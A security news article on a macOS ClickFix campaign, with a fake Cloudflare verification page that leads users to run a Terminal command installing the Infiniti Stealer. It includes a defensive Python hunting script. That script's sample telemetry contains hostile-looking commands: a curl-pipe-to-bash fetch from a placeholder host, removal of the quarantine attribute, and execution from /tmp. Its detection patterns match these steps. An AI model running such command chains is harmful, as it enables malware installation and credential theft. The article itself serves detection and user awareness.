Cloudflare-Themed ClickFix Attack Drops Infiniti Stealer on Macs

Malwarebytes has reported a fresh ClickFix campaign targeting macOS users that uses a Cloudflare-themed verification page to deliver a Python-based information stealer.

The Attack Chain

The infection chain begins with a fake CAPTCHA page: a legitimate-looking Cloudflare human verification page that asks visitors to paste and execute a command in Terminal.

Referred to as ClickFix, the technique relies on social engineering to trick users into executing malicious commands on their own devices, so no software vulnerability is exploited; the victim performs the initial execution. The technique has been widely used in attacks since August 2024, mainly against Windows users.

The Fake Verification Page

The fake verification page gives macOS users step-by-step instructions to open Terminal, then paste and run a fake verification command that actually starts the malware.

Once the victim runs the command, a Bash script is fetched from a remote server. The script decodes an embedded payload, writes the second-stage binary to a temporary folder, removes its quarantine flag (the com.apple.quarantine extended attribute that Gatekeeper uses to decide whether a downloaded file must be checked before it runs), and executes it.

The Loader and Payload

The script also passes the command-and-control (C&C) server address and authentication tokens to the payload as environment variables rather than command-line arguments, deletes itself, and closes Terminal.
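Each step of the chain described above (a remote script piped into a shell from Terminal, the quarantine attribute removed, a binary run from a temporary folder, the script deleting itself and closing Terminal) is common on its own in benign administration; what marks ClickFix is the sequence within one Terminal session. The following Python is an added example written for this article, not Malwarebytes' code and not the campaign's script. It assumes process-start telemetry as NDJSON with pid, ppid, image and cmdline fields (a shape modelled on generic EDR output), groups events by their Terminal ancestor, and flags a session only when at least two stages appear. The sample events are constructed for illustration and collapse the pasted pipeline into a single shell -c event; the hostnames are placeholders.

```python
"""Hunt for a macOS ClickFix-style command chain in process-start telemetry.

Added example for this article; not Malwarebytes' code and not the campaign's
script. The NDJSON event shape (pid, ppid, image, cmdline) is an assumption
modelled on generic EDR telemetry, and SAMPLE_EVENTS is constructed for
illustration, not captured from the real campaign.
"""
import json
import re
from collections import defaultdict

TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
_TEMP_ALT = "|".join(re.escape(d) for d in TEMP_DIRS)

# One pattern per stage of the chain described in the article. Any single
# stage is common in benign admin work; the combination is what matters.
STAGE_PATTERNS = {
    "remote_script_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "quarantine_flag_removed": re.compile(r"\bxattr\s+(-\w*d\w*\s+com\.apple\.quarantine|-\w*c)\b"),
    "execution_from_temp_dir": re.compile(r"^(?:" + _TEMP_ALT + r")\S+"),
    "self_deletion_in_temp_dir": re.compile(r"\brm\s+(?:-\w+\s+)*(?:\"?\$0|(?:" + _TEMP_ALT + r"))"),
    "terminal_closed_by_script": re.compile(r"osascript\b.*\bTerminal\b.*\bquit\b", re.I),
}

# Constructed sample telemetry: one malicious Terminal session (pid 500) and
# two benign ones (a developer clearing quarantine on a download, and a
# curl | bash installer) that each trip only one stage.
SAMPLE_EVENTS = """
{"pid": 500, "ppid": 1, "image": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid": 501, "ppid": 500, "image": "zsh", "cmdline": "/bin/zsh -c 'curl -fsSL https://verify.example.invalid/cf.sh | bash'"}
{"pid": 502, "ppid": 501, "image": "bash", "cmdline": "bash"}
{"pid": 503, "ppid": 502, "image": "xattr", "cmdline": "xattr -d com.apple.quarantine /tmp/.cf_verify"}
{"pid": 504, "ppid": 502, "image": ".cf_verify", "cmdline": "/tmp/.cf_verify"}
{"pid": 505, "ppid": 502, "image": "rm", "cmdline": "rm -f /tmp/cf.sh"}
{"pid": 506, "ppid": 502, "image": "osascript", "cmdline": "osascript -e 'tell application \\"Terminal\\" to quit'"}
{"pid": 600, "ppid": 1, "image": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid": 601, "ppid": 600, "image": "zsh", "cmdline": "/bin/zsh -c 'xattr -d com.apple.quarantine ~/Downloads/tool.dmg'"}
{"pid": 700, "ppid": 1, "image": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid": 701, "ppid": 700, "image": "zsh", "cmdline": "/bin/zsh -c 'curl -fsSL https://pkg.example.invalid/install.sh | bash'"}
"""


def terminal_session(pid, by_pid):
    """Walk the parent chain and return the pid of the Terminal ancestor, or None."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        event = by_pid[pid]
        if event["image"] == "Terminal":
            return pid
        pid = event["ppid"]
    return None


def hunt(ndjson_lines, min_stages=2):
    """Return {terminal_pid: {stage: first matching cmdline}} for sessions
    in which at least min_stages distinct chain stages were observed."""
    events = [json.loads(line) for line in ndjson_lines if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    stages = defaultdict(dict)
    for event in events:
        root = terminal_session(event["pid"], by_pid)
        if root is None:
            continue  # not descended from Terminal; outside this hunt's scope
        for name, pattern in STAGE_PATTERNS.items():
            if pattern.search(event["cmdline"]):
                stages[root].setdefault(name, event["cmdline"])
    return {root: hits for root, hits in stages.items() if len(hits) >= min_stages}


if __name__ == "__main__":
    for root, hits in hunt(SAMPLE_EVENTS.splitlines()).items():
        print(f"Terminal session {root}: {len(hits)} chain stages observed")
        for stage, cmdline in hits.items():
            print(f"  {stage}: {cmdline}")
```

With the default threshold only session 500 is reported, with all five stages; lowering min_stages to 1 also surfaces the two benign sessions, which is the trade-off a detection engineer tunes against their own environment's baseline of curl | bash installs and manual xattr use.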

The binary dropped by the script is a loader compiled with Nuitka, a compiler that translates Python code into C and builds a native binary. Because no plain Python source or bytecode is shipped, the usual decompilation approach does not apply, making static analysis more difficult.

At runtime, the loader decompresses embedded data and launches the final payload, identified as the Infiniti Stealer malware.

The Infiniti Stealer

The Python-based information stealer targets browser credentials, Keychain information, cryptocurrency wallets, secrets stored in developer files, and screenshots captured during execution.

The data is sent to the C&C server via HTTP POST requests. Once collection has completed, the malware sends a notification to a Telegram channel and queues the captured credentials to be cracked on the server.

Evasion Techniques

For evasion, Infiniti Stealer relies on a randomized execution delay and on checking whether it is running in a known analysis environment.

“Infiniti Stealer shows how techniques that worked on Windows—like ClickFix—are now being adapted to target Mac users. It also uses newer techniques, like compiling Python into native apps, which makes the malware harder to detect and analyze. If this approach proves effective, we may see more attacks like this,” Malwarebytes notes.

Conclusion

The ClickFix campaign targeting macOS users is a concerning development, as it shows malware authors porting a proven social-engineering technique to a new platform with little more than a macOS-specific script and a Python payload.

The practical lesson for users is simple: no legitimate website or CAPTCHA ever needs you to paste a command into Terminal. Any page that asks for it should be treated as malicious, however convincing it looks.

By staying informed and taking proactive measures to secure their devices, users can reduce the risk of falling victim to such attacks.